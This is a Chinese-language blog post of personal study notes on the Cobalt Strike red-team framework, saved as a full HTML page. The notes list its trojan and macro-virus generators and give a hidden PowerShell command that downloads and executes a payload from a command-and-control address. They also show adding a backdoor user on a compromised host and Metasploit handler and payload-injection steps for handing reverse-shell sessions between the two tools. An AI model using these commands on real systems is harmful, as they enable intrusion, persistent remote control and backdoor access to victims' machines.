

<!DOCTYPE html>
<html lang="">
<head prefix="og: http://ogp.me/ns#"><meta name="generator" content="Hexo 3.8.0">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
    <meta name="description" content="">
    <title>Cobalt Strike学习笔记 | c1y2m3’blog</title>

    <!-- Open Graph -->
    <meta name="description" content="&amp;#x3000;Cobalt Strike &amp;#x4E00;&amp;#x6B3E;&amp;#x4EE5;metasploit&amp;#x4E3A;&amp;#x57FA;&amp;#x7840;&amp;#x7684;GUI&amp;#x7684;&amp;#x6846;&amp;#x67B6;&amp;#x5F0F;&amp;#x6E17;&amp;#x900F;&amp;#x6D4B;&amp;#x8BD5;&amp;#x5DE5;&amp;#x5177;&amp;#x3002; &amp;#x3000; 0x01 &amp;#x5B8">
<meta property="og:type" content="article">
<meta property="og:title" content="Cobalt Strike学习笔记">
<meta property="og:url" content="http://yoursite.com/2018/09/29/ Cobalt Strike学习笔记/index.html">
<meta property="og:site_name" content="c1y2m3’blog">
<meta property="og:description" content="&amp;#x3000;Cobalt Strike &amp;#x4E00;&amp;#x6B3E;&amp;#x4EE5;metasploit&amp;#x4E3A;&amp;#x57FA;&amp;#x7840;&amp;#x7684;GUI&amp;#x7684;&amp;#x6846;&amp;#x67B6;&amp;#x5F0F;&amp;#x6E17;&amp;#x900F;&amp;#x6D4B;&amp;#x8BD5;&amp;#x5DE5;&amp;#x5177;&amp;#x3002; &amp;#x3000; 0x01 &amp;#x5B8">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baef5caea3b4a262af7be9b">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baef62fea3b4a262af7cbca">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baefa1550f8dd17df72d58e">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baf105ddb5aa66c49adbcba">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baeff52db5aa66c49ac9f40">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5baf020bea3b4a262af8e6cf">
<meta property="og:updated_time" content="2018-11-18T16:44:24.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Cobalt Strike学习笔记">
<meta name="twitter:description" content="&amp;#x3000;Cobalt Strike &amp;#x4E00;&amp;#x6B3E;&amp;#x4EE5;metasploit&amp;#x4E3A;&amp;#x57FA;&amp;#x7840;&amp;#x7684;GUI&amp;#x7684;&amp;#x6846;&amp;#x67B6;&amp;#x5F0F;&amp;#x6E17;&amp;#x900F;&amp;#x6D4B;&amp;#x8BD5;&amp;#x5DE5;&amp;#x5177;&amp;#x3002; &amp;#x3000; 0x01 &amp;#x5B8">
<meta name="twitter:image" content="https://www.yunzhijia.com/microblog/filesvr/5baef5caea3b4a262af7be9b">

    <script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Person",
  "email": "mailto:",
  "image": "",
  "name": "John Doe",
  "url": "http://yoursite.com"
}
</script>
    <script>
    var algoliaEnabled = false;
    
</script>

    

    
    
        <link href="https://fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
    
    
    
        <!-- stylesheets list from config.yml -->
        
        <link rel="stylesheet" href="/c1y2m3.github.io/css/aloha.css">
        
        <link rel="stylesheet" href="//cdn.bootcss.com/semantic-ui/2.2.4/semantic.min.css">
        
        <link rel="stylesheet" href="//cdn.bootcss.com/magnific-popup.js/1.1.0/magnific-popup.min.css">
        
    

</head>
<body id="body" style="margin-bottom: 0;" class="pushable">

    <div class="ui top fixed menu">
        <a class="item" id="menu-icon"><i class="sidebar icon"></i></a>
    </div>

    <div id="menu-sidebar" class="ui left vertical sidebar menu">

    <div id="sidebar-top">
        <div class="content">
            <h3>c1y2m3’blog</h3>
        </div>
    </div>
    <div class="ui container sidebar-card">
    <div class="ui people shape content">
        <div class="active side">
            <div class="ui card">
                <div class="image">
                    <img class="ui medium bordered image" src="/c1y2m3.github.io/images/avatar.jpg">
                </div>
                <div class="content">
                    <a class="header">John Doe</a>
                    
                </div>
                <div class="extra content">
                    <div class="ui list">
                        
                        
                    </div>

                </div>
                <div class="extra content">
                    <div class="ui list">
                        
                    </div>
                </div>
            </div>
        </div>
    </div>


</div>

    
    

    

    
    <a href="/index.html" class="item">
        <i class="home icon"></i>
        HOME
    </a>

    

    
</div>

    <div class="pusher body-content">
        <div id="content" class="ui main container">
            <!--<div class="ui one column grid">-->
                <!--<div class="column">-->
                    <!--<div class="ui main container">-->
                        <div id="post- Cobalt Strike学习笔记" class="ui main container article-type-post">

    

    <div class="ui divided grid">

        <div class="two column row" id="article-content">

            <div class="thirteen wide computer thirteen wide tablet sixteen wide mobile column">
                

<h1 class="ui header">
    
    Cobalt Strike学习笔记
</h1>



                <div class="article-inner">

                    <div class="article-entry" itemprop="articleBody">
                        
                        <p>&#x3000;Cobalt Strike &#x4E00;&#x6B3E;&#x4EE5;metasploit&#x4E3A;&#x57FA;&#x7840;&#x7684;GUI&#x7684;&#x6846;&#x67B6;&#x5F0F;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x5DE5;&#x5177;&#x3002;
&#x3000;</p>
<h5 id="0x01-&#x5B89;&#x88C5;&#x4E0E;&#x8FD0;&#x884C;"><a href="#0x01-&#x5B89;&#x88C5;&#x4E0E;&#x8FD0;&#x884C;" class="headerlink" title="0x01 &#x5B89;&#x88C5;&#x4E0E;&#x8FD0;&#x884C;"></a>0x01 &#x5B89;&#x88C5;&#x4E0E;&#x8FD0;&#x884C;</h5><p>Java&#x73AF;&#x5883;&#xFF0C;&#x670D;&#x52A1;&#x7AEF;&#x8FD0;&#x884C;&#x5728;Linux&#x7CFB;&#x7EDF;&#x4E0A;&#x3002;</p>
<p><code>sudo ./teamserver 172.28.100.188 root</code></p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baef5caea3b4a262af7be9b"><img src="https://www.yunzhijia.com/microblog/filesvr/5baef5caea3b4a262af7be9b" alt="" class="ui centered image"></a></p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baef62fea3b4a262af7cbca"><img src="https://www.yunzhijia.com/microblog/filesvr/5baef62fea3b4a262af7cbca" alt="" class="ui centered image"></a></p>
<ul class="ui list">
<li><ul>
<li></li>
</ul>
</li>
</ul>
<h5 id="0x02-&#x53C2;&#x6570;&#x8BE6;&#x60C5;"><a href="#0x02-&#x53C2;&#x6570;&#x8BE6;&#x60C5;" class="headerlink" title="0x02 &#x53C2;&#x6570;&#x8BE6;&#x60C5;"></a>0x02 &#x53C2;&#x6570;&#x8BE6;&#x60C5;</h5><ol class="ui list">
<li><code>View =&gt; Credentials</code><br>&#x901A;&#x8FC7;hashdump&#x6216;&#x8005;Mimikatz&#x6293;&#x53D6;&#x8FC7;&#x7684;&#x5BC6;&#x7801;&#x90FD;&#x4F1A;&#x50A8;&#x5B58;&#x5728;&#x8FD9;&#x91CC;&#x3002;<br><code>Web log =&gt; #&#x663E;&#x793A;web&#x8BBF;&#x95EE;&#x8BB0;&#x5F55;</code></li>
<li>Packages  #&#x653B;&#x51FB;&#x5305;<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">HTML Application   &#x751F;&#x6210;&#x6076;&#x610F;&#x7684;HTA&#x6728;&#x9A6C;&#x6587;&#x4EF6;</span><br><span class="line">MS Office Macro   &#x751F;&#x6210;office&#x5B8F;&#x75C5;&#x6BD2;&#x6587;&#x4EF6;</span><br><span class="line">Payload Generator   &#x751F;&#x6210;&#x5404;&#x79CD;&#x8BED;&#x8A00;&#x7248;&#x672C;&#x7684;payload</span><br><span class="line">USB/CD AutoPlay   &#x751F;&#x6210;&#x5229;&#x7528;&#x81EA;&#x52A8;&#x64AD;&#x653E;&#x8FD0;&#x884C;&#x7684;&#x6728;&#x9A6C;&#x6587;&#x4EF6;</span><br><span class="line">Windows Dropper   &#x6346;&#x7ED1;&#x5668;&#xFF0C;&#x80FD;&#x591F;&#x5BF9;&#x6587;&#x6863;&#x7C7B;&#x8FDB;&#x884C;&#x6346;&#x7ED1;</span><br><span class="line">Windows Executable   &#x751F;&#x6210;&#x53EF;&#x6267;&#x884C;exe&#x6728;&#x9A6C;</span><br><span class="line">Windows Executable(S)  &#x751F;&#x6210;&#x65E0;&#x72B6;&#x6001;&#x7684;&#x53EF;&#x6267;&#x884C;exe&#x6728;&#x9A6C;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<ul class="ui list">
<li><ul>
<li></li>
</ul>
</li>
</ul>
<h5 id="0x03-&#x57FA;&#x672C;&#x8FD0;&#x884C;"><a href="#0x03-&#x57FA;&#x672C;&#x8FD0;&#x884C;" class="headerlink" title="0x03 &#x57FA;&#x672C;&#x8FD0;&#x884C;"></a>0x03 &#x57FA;&#x672C;&#x8FD0;&#x884C;</h5><p>&#x9996;&#x5148;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;Listener&#xFF0C;&#x70B9;&#x51FB;cobalt strike -&gt;Listeners -&gt; Add</p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baefa1550f8dd17df72d58e"><img src="https://www.yunzhijia.com/microblog/filesvr/5baefa1550f8dd17df72d58e" alt="" class="ui centered image"></a></p>
<p><code>powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&apos;http://172.28.100.188:81/a&apos;))&quot;</code></p>
<h5 id="word&#x5B8F;-CHM&#x5236;&#x4F5C;-LNK-&#x6C34;&#x5751;&#x653B;&#x51FB;-&#x5F85;&#x7EED;&#xFF01;"><a href="#word&#x5B8F;-CHM&#x5236;&#x4F5C;-LNK-&#x6C34;&#x5751;&#x653B;&#x51FB;-&#x5F85;&#x7EED;&#xFF01;" class="headerlink" title="word&#x5B8F; CHM&#x5236;&#x4F5C; LNK &#x6C34;&#x5751;&#x653B;&#x51FB; &#x5F85;&#x7EED;&#xFF01;"></a>word&#x5B8F; CHM&#x5236;&#x4F5C; LNK &#x6C34;&#x5751;&#x653B;&#x51FB; &#x5F85;&#x7EED;&#xFF01;</h5><ul class="ui list">
<li><ul>
<li></li>
</ul>
</li>
</ul>
<h5 id="&#x53F3;&#x952E;-&#x8FDB;&#x5165;-Interact-&#x8FDB;&#x5165;&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;"><a href="#&#x53F3;&#x952E;-&#x8FDB;&#x5165;-Interact-&#x8FDB;&#x5165;&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;" class="headerlink" title="&#x53F3;&#x952E; &#x8FDB;&#x5165; Interact &#x8FDB;&#x5165;&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;"></a>&#x53F3;&#x952E; &#x8FDB;&#x5165; Interact &#x8FDB;&#x5165;&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;</h5><p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baf105ddb5aa66c49adbcba"><img src="https://www.yunzhijia.com/microblog/filesvr/5baf105ddb5aa66c49adbcba" alt="" class="ui centered image"></a></p>
<p><code>&#x8BE6;&#x60C5;&#x8F93;&#x5165; Help</code> shell net user test test /add</p>
<ul class="ui list">
<li><ul>
<li><h3 id="0x04-&#x4E0E;msf&#x8FDB;&#x884C;&#x8054;&#x52A8;"><a href="#0x04-&#x4E0E;msf&#x8FDB;&#x884C;&#x8054;&#x52A8;" class="headerlink" title="0x04 &#x4E0E;msf&#x8FDB;&#x884C;&#x8054;&#x52A8;"></a>0x04 &#x4E0E;msf&#x8FDB;&#x884C;&#x8054;&#x52A8;</h3>&#x6743;&#x9650;&#x7EF4;&#x6301;&#xFF1A;<br>&#x5F53;cs&#x83B7;&#x53D6;&#x5230;&#x4E00;&#x4E2A;&#x4E0A;&#x7EBF;&#x673A;&#x5668;&#xFF0C;&#x628A;&#x8FD9;&#x4E2A;&#x673A;&#x5668;&#x4E22;&#x7ED9;msf&#x4E2D;meterpreter&#x83B7;&#x53D6;session</li>
</ul>
</li>
</ul>
<p><code>msf &gt; use exploit/multi/handler</code></p>
<p><code>msf exploit(handler) &gt; set payload</code></p>
<p><code>windows/meterpreter/reverse_tcp</code></p>
<p><code>payload =&gt; windows/meterpreter/reverse_tcp</code></p>
<p><code>msf exploit(handler) &gt; set lhost 192.168.3.72</code></p>
<p><code>lhost =&gt; 192.168.3.72</code></p>
<p><code>msf exploit(handler) &gt; set lport 5555</code></p>
<p><code>lport =&gt; 5555</code></p>
<p><code>msf exploit(handler) &gt; exploit -j</code></p>
<ul class="ui list">
<li><ul>
<li></li>
</ul>
</li>
</ul>
<p>&#x4E4B;&#x540E;Cobalt strike &#x521B;&#x5EFA;&#x4E00;&#x4E2A;windows/foreign/reverse_tcp Listener&#xFF0C;&#x5176;&#x4E2D;ip&#x4E3A;msf&#x7684;ip&#x5730;&#x5740;&#xFF0C;&#x7AEF;&#x53E3;&#x4E3A;msf&#x76D1;&#x542C;&#x7684;&#x7AEF;&#x53E3;&#x3002;</p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baeff52db5aa66c49ac9f40"><img src="https://www.yunzhijia.com/microblog/filesvr/5baeff52db5aa66c49ac9f40" alt="" class="ui centered image"></a></p>
<p>&#x7136;&#x540E;&#x9009;&#x4E2D;&#x8BA1;&#x7B97;&#x673A;&#xFF0C;&#x53F3;&#x952E;-&gt;Spawn:&#x9009;&#x62E9;&#x521A;&#x521A;&#x521B;&#x5EFA;&#x7684;&#x76D1;&#x542C;&#x5668;&#xFF1A;<br>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x76EE;&#x6807;&#x4E3B;&#x673A;&#x7684;&#x5DF2;&#x4E0A;&#x7EBF;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x8FDB;&#x884C;&#x6211;&#x4EEC;&#x7684;&#x64CD;&#x4F5C;&#x4E86;&#x3002;</p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5baf020bea3b4a262af8e6cf"><img src="https://www.yunzhijia.com/microblog/filesvr/5baf020bea3b4a262af8e6cf" alt="" class="ui centered image"></a></p>
<ul class="ui list">
<li><ul>
<li></li>
</ul>
</li>
</ul>
<h5 id="0x05-&#x4E0E;cs&#x8FDB;&#x884C;&#x8054;&#x52A8;"><a href="#0x05-&#x4E0E;cs&#x8FDB;&#x884C;&#x8054;&#x52A8;" class="headerlink" title="0x05 &#x4E0E;cs&#x8FDB;&#x884C;&#x8054;&#x52A8;"></a>0x05 &#x4E0E;cs&#x8FDB;&#x884C;&#x8054;&#x52A8;</h5><p>msf&#x83B7;&#x5F97;&#x4E86;&#x4E00;&#x4E2A;meterpreter&#x7684;session&#xFF0C;&#x60F3;&#x628A;session&#x4F20;&#x7ED9;cs<br>&#x5728;cs&#x521B;&#x5EFA;&#x4E00;&#x4E2A;&#x76D1;&#x542C;&#xFF0C;host&#x4FEE;&#x6539;&#x6210;cs&#x5BA2;&#x6237;&#x7AEF;IP&#xFF0C;&#x76D1;&#x542C;6666&#x7AEF;&#x53E3;&#x3002;</p>
<p>&#x6B64;&#x65F6;&#x5207;&#x6211;&#x4EEC;&#x6362;&#x5230;meterpreter&#x4E2D;&#xFF0C;</p>
<p><code>meterpreter &gt; background # &#x5207;&#x6362;&#x5230;&#x540E;&#x53F0;</code></p>
<p><code>msf exploit(handler) &gt; use</code></p>
<p><code>exploit/windows/local/payload_inject</code></p>
<p><code>&#x8FD9;&#x4E2A;exploit&#x662F;&#x6CE8;&#x5165;&#x4E00;&#x4E2A;&#x65B0;&#x7684;payload &#x5230;&#x5F53;&#x524D;&#x7684;session&#x91CC;&#x9762;</code></p>
<p><code>msf exploit(payload_inject) &gt; set payload</code></p>
<p><code>windows/meterpreter/reverse_http # &#x4E0D;&#x80FD;&#x4F7F;&#x7528;x64&#x7684;payload</code></p>
<p><code>msf exploit(payload_inject) &gt; set DisablePayloadHandler true</code><br><code>&#x5173;&#x95ED;msf payload&#x7684;&#x76D1;&#x542C;&#xFF0C;&#x53EF;&#x4EE5;&#x4E0D;&#x7528;&#x8BBE;&#x7F6E;&#xFF0C;&#x4E0D;&#x5F71;&#x54CD;&#x6548;&#x679C;</code></p>
<p><code>msf exploit(payload_inject) &gt; set lhost 192.168.3.103</code></p>
<p><code>msf exploit(payload_inject) &gt; set lport 6666 # &#x76D1;&#x542C;&#x8005;&#x7684;&#x76D1;&#x542C;&#x7AEF;&#x53E3;</code></p>
<p><code>msf exploit(payload_inject) &gt; set session 1</code></p>
<p><code>msf exploit(payload_inject) &gt; exploit</code></p>
<p>&#x6839;&#x636E;&#x4E0A;&#x7EBF;&#x7684;&#x8089;&#x9E21;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;SOCKS&#x4EE3;&#x7406;</p>

                        
                    </div>

                    
                    
                    

                    <div class="description post-description">
    <span class="post-description-item">
        <time datetime="2018-09-28T16:34:14.000Z" itemprop="datePublished">2018-09-29</time>

    </span>
    <span class="post-description-item">
        
    </span>
</div>

                </div>
                
                <div id="pagination" class="nav-web ui text container pagination">

    <div class="ui stackable two column divided grid container">
        <div class="row">
            <div class="column nav-left">
                

                <a href="/c1y2m3.github.io/2018/10/07/关于前期信息收集笔记/" class="ui tiny button">

                    <i class="angle left icon"></i>
                    
                    关于前期信息收集笔记
                    

                </a>

                
            </div>
            <div class="column nav-right">
                

                <a href="/c1y2m3.github.io/2018/09/26/ redis安全详解/" class="ui tiny button">
                    
                    Redis学习详解
                    
                    <i class="angle right icon"></i></a>
                
            </div>
        </div>
    </div>

</div>
                
            </div>

            
            <div class="three wide computer three wide tablet column">

                <div class="ui sticky article-toc" id="article-toc">
                    <!-- toc -->
                    <ol class="ui ordered list"><li><a href="#0x01-安装与运行"><span>0x01 安装与运行</span></a></li><li><a href="#0x02-参数详情"><span>0x02 参数详情</span></a></li><li><a href="#0x03-基本运行"><span>0x03 基本运行</span></a></li><li><a href="#word宏-CHM制作-LNK-水坑攻击-待续！"><span>word宏 CHM制作 LNK 水坑攻击 待续！</span></a></li><li><a href="#右键-进入-Interact-进入交互模式"><span>右键 进入 Interact 进入交互模式</span></a></li></ol><li><a href="#0x04-与msf进行联动"><span>0x04 与msf进行联动</span></a><ol><li><a href="#0x05-与cs进行联动"><span>0x05 与cs进行联动</span></a></li></ol>
                </li></div>

            </div>
            

        </div>
    </div>
</div>


                    <!--</div>-->
                <!--</div>-->
            <!--</div>-->
        </div>
        <div class="ui vertical footer segment">
    <div class="ui center aligned container">
        <div class="ui inverted section divider"></div>
        &copy; 2019 <a href="/">John Doe</a>,
        Powered by <a href="https://github.com/henryhuang/hexo-theme-aloha" target="_blank">Aloha</a> and <a href="http://hexo.io/" target="_blank">Hexo</a>.
    </div>
</div>

    </div>




<!-- scripts list from theme config.yml -->

<script src="//cdn.bootcss.com/jquery/3.1.0/jquery.min.js"></script>

<script src="//cdn.bootcss.com/semantic-ui/2.2.4/semantic.min.js"></script>

<script src="//cdn.bootcss.com/algoliasearch/3.18.1/algoliasearch.min.js"></script>

<script src="//cdn.bootcss.com/algoliasearch-helper-js/2.13.0/algoliasearch.helper.min.js"></script>

<script src="/c1y2m3.github.io/js/semantic-ui-algolia.js"></script>

<script src="/c1y2m3.github.io/js/aloha-events.js"></script>



</body>
</html>
